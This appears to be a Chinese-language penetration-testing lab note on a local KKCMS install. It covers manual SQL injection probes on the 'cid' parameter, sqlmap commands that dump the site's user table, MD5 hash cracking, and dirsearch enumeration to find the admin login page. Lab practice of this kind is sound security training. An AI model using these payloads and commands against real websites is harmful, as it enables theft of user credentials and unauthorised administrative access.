目录

账号

网站目录

---

快看CMS使用手册

http://10.141.19.241/kkcms/install/

常规思路：页面点点观察url变化，参数

常规思路：点一个功能模块抓包看什么东西，正确是什么样，错误的是什么样，构造参数。

账号

随便选一个功能模块，一直在变

http://10.141.19.241/kkcms/vlist.php?cid=0

http://10.141.19.241/kkcms/vlist.php?cid=126

http://10.141.19.241/kkcms/vlist.php?cid=127

手工判断

cid=127 or 1%23
cid=127 or 0%23
cid=127 and sleep(3)%23

burpsuite抓包保存2.txt

sqlmap测试

python sqlmap.py -r  2.txt -dbs

python sqlmap.py -r  2.txt -D kkcms -tables

python sqlmap.py -r  2.txt -D kkcms -T xtcms_user  -dump-all

md5在线解密破解,md5解密加密

同样的操作你可以去跑其它的看看

网站目录

kali启用dirsearch网站目录探测

git clone https://github.com/maurosoria/dirsearch.git

cd dirsearch       #pwd  #/home/kali/dirsearch

#Pythone3.10后禁 pip 安装包到全局环境而pipx 会为每个工具创建独立的虚拟环境。

pipx install .

dirsearch -u http://10.141.19.241/kkcms/ -e php

访问http://10.141.19.241/kkcms/admin/cms_login.php

说明，不做其它过多测试，实验进入到后台即可。想玩的自己玩。